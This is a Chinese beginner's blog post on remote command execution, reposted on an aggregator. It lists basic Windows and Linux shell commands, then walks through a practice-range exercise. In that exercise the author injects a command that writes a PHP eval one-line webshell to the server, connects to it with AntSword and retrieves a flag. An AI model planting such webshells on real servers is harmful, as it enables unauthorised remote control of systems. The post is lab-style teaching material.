初学RCE漏洞

news/2025/11/23 0:15:10/文章来源:https://www.cnblogs.com/wuhand/p/19258974

初学RCE漏洞

远程命令执行

命令注入漏洞---构造恶意的操作执行命令,通过请求的方式将命令传输到服务器中,并执行

操作系统

Windows和Linux

基础的操作系统命令

windows

命令行-- win+r --> 输入cmd回车

测试与目标之间的连通性(能否与对方相互传输数据) --- ping 域名/IP地址

查看当前目录下的所有文件/文件夹 --- dir

新建文件夹 --- mkdir

切换目录(文件夹) --- cd 相对路径/绝对路径

绝对路径:完整路径

相对路径:有使用./和../

​ ../ --- 上一级文件夹

​ ./ --- 当前文件夹

新建文件夹 --- type nul > 文件名称

读取文件 --- type

写入文件 ---- echo

​ echo 123456 > xx.txt ------ 将123456写入(覆盖)到xx.txt

​ echo 123456 >> xx.txt ------- 将123456写入(追加) 到xx.txt

Linux

测试与目标之间的连通性(能否与对方相互传输数据) --- ping 域名/IP地址

查看当前目录下的所有文件/文件夹 --- ls/dir(不常用) (经常用于判断是否为Linux系统)

新建文件夹 --- mkdir

新建文件夹 --- touch 文件名称

读取文件 ----- cat

写入文件 ---- echo

​ echo 123456 > xx.txt ------ 将123456写入(覆盖)到xx.txt

​ echo 123456 >> xx.txt ------- 将123456写入(追加) 到xx.txt

实操

http://43.139.231.237:34063/

用dir进行查看

image-20251122234714223

image-20251122234727856

检测是哪种操作系统

image-20251122234754825

确定之后往里面新建php文件,为之后植入一句话木马做准备

image-20251122235016437

输入一句话木马echo ‘<?php @eval($_POST[%27888%27]);?》’>jiaqi.php

image-20251122235314550

打开中国蚁剑进行验证是否注入一句话木马

蚁剑连接网址:所处文件位置+目标.php 如http://43.139.231.237:34063/search/chaojijiaqi.php

image-20251122235647289

进入后查找目标flag

image-20251122235753818

image-20251122235806661

image-20251122235833051

image-20251122235913820

image-20251123000004124

image-20251123000042172

最后获取flag

以上操作需在法律规定范围内,可攻击靶场内才可执行

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/973561.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

可能是全网最好的笔记本电脑降压定频调时序入门教程

@[TOC](文章目录)---# 修改bios参数的方法所有降压定频调时序的操作,本质都是对bios里的参数进行修改。不同于台式机,遗憾的是,笔记本电脑的厂商为了确保稳定性,通常会对笔记本电脑的bios进行锁定,限制用户修改。…

if -z linux

你的命令 if -z linux 是一个语法错误,因为 if 命令的条件判断不能直接使用字符串 linux 来判断。正确的用法应该是:正确的命令:if [ -z "$linux" ]; then echo "Linux is not set"else …

idea怎么备份mysql数据库

在IntelliJ IDEA中备份MySQL数据库,你可以按照以下步骤操作:打开IntelliJ IDEA并连接到MySQL服务器:启动IntelliJ IDEA,然后选择“Database”工具窗口。如果你没有看到这个工具窗口,可以通过点击主菜单中的“View…

idea mysql怎么创建表

在IntelliJ IDEA中创建MySQL表,可以按照以下步骤操作:启动MySQL服务器:确保MySQL服务器已经启动并运行。 连接到MySQL数据库:在IntelliJ IDEA中,点击“File”菜单,选择“Settings”(或者使用快捷键Ctrl+Alt+S)…

python保存数组文件到本地

python保存数组文件到本地 从本地数组载入文件 import numpy as np#保存数组文件到本地 np.save(data_x.npy,data_x) np.save(label_x.npy,label_x)#从本地载入文件 data_x = np.load(data_x.npy) label_x = np.load(l…

2025年11月国际物流企业TOP10权威排行榜,欧美加专线空运整柜拼箱、货代、外贸货代方案,时效快,用户口碑好!

随着全球贸易的不断深化,国际物流行业在2025年迎来了新一轮的竞争与创新。企业评估基于服务网络、时效可靠性、客户满意度及技术创新等多维度指标,旨在为跨境商家提供实用参考。以下为2025年国际物流企业TOP10权威排…

专注过程

最近我在思考一个问题:过程和结果哪个是最重要的?为什么? 专注过程和专注结果的人有什么不同? 我现在的回答是:过程!!!过程可控,结果不可控,只有过程做好了,才会有好的结果 专注过程的人:向内求,不断挑战…

详解MySQL 的系统变量、状态

详解MySQL 的系统变量、状态 搞懂这三个命令的区别,核心是 变量作用域(全局 / 会话),你的部分理解需要修正 ——show VARIABLES 并非 “叠加”,而是默认显示「当前会话生效的变量」;session 和 global 变量也并…

第33天(简单题中等题 数据结构:哈希表、滑动窗口)

打卡第三十三天 4道简单题+1道中等题题目:思路:滑动窗口+哈希表 代码: class Solution { public:int minimumCardPickup(vector<int>& cards) {unordered_map<int,int> count;// 哈希表,记录窗口内…

CatWalk使用方法

CatWalk使用方法 界面:1.选中个体,鼠标右击,点击“Acquire Runs” 此时把老鼠放在装置外面准备开始检测。 2.点击“Snap Background”,再点击“Start Acquisition”,开始检测。 此时把老鼠放进装置入口。 3.若中途出…

2025临沂口腔服务推荐:覆盖全年龄段需求,这家机构实力领先

随着健康意识的提升和审美需求的增长,口腔健康已成为全民关注的重点。在2025年临沂口腔服务市场中,铂菲克口腔凭借完善的全科服务体系、覆盖全年龄段的个性化方案以及专业的服务团队,成为众多市民的信赖之选。无论是…

太认可了,交易就是【不预测,只应对】和【关注执行,忽略收益】

这个视频讲的,和我自己的感悟非常契合。第一条,就是学知利行常常讲的,不预测,只应对。不要自大到觉得可以分析交易,交易最大的特点,就是根本不可能被预测。第二条,是我自己的感悟。当注意力放到盈亏数字上时,会…

StarBlog小更新,文章管理体验巨大提升,重写了几个管理后台页面

前言 最近想整理一下博客的文章 结果发现这个博客后台实在是简陋,整理起来非常麻烦 虽然我已经决定要对 starblog 进行重构了 但是远水救不得近火 还是得先用现有破破烂烂的管理后台来解决眼前的需求 所以我决定对管理…

前三次OO作业总结

一、前言: 这次三次电梯调度作业是迭代开发的模式,核心都是做单部电梯的调度逻辑,从单纯实现功能,到慢慢抠面向对象设计原则,再到最后优化代码的可维护性。说真的,这三次作业的投入时间和难度完全成正比,而且第…

用 C# 和 Tesseract OCR 识别验证码

安装 Tesseract OCR 和相关依赖在 C# 中使用 Tesseract,需要通过 NuGet 安装 Tesseract 包。 安装 Tesseract NuGet 包 打开 Visual Studio。 在项目中右键点击 NuGet 包管理器 > 管理 NuGet 包。 搜索 Tesseract …

用 C++ 和 Tesseract OCR 识别验证码

安装 Tesseract OCR在使用 C++ 实现验证码识别之前,需要先安装 Tesseract OCR 引擎。可以通过以下方式安装: 更多内容访问ttocr.com或联系1436423940 在 Ubuntu 上安装: sudo apt-get update sudo apt-get install …

2025最新临沂口腔服务推荐,洗牙、全瓷牙,专业可靠,值得信赖

随着人们口腔健康意识的提升,专业口腔服务需求日益增长。本榜单基于技术设备、医师团队、服务覆盖等维度,结合临沂本地患者满意度调研数据,权威解析2025年临沂五大口腔品牌综合实力,为市民选择口腔服务提供专业参考…

C++ 和 Tesseract OCR 识别验证码

安装 Tesseract OCR 更多内容访问ttocr.com或联系1436423940 首先,我们需要安装 Tesseract OCR。根据不同操作系统进行安装。在 Ubuntu 上安装: sudo apt update sudo apt install tesseract-ocr sudo apt install l…

2025.11.22总结

CS架构项目全解析 1.首先安装编译器配置环境,我这里安装的是visual studio 社区版2022 下载完编译器后配置c#环境,点击修改下载红框勾选部分2.项目的初始化 首先打开visual studio ,创建新项目选择空项目修改名字后…

若依框架源码—3

主干——ruoyi-admin 模块文件图片启动类 RuoYiApplication启动应用这个与我们默认创建的项目的启动主要有两点不同exclude = { DataSourceAutoConfiguration.class } 排除了自动配置的数据源为什么要排除自动配置的数…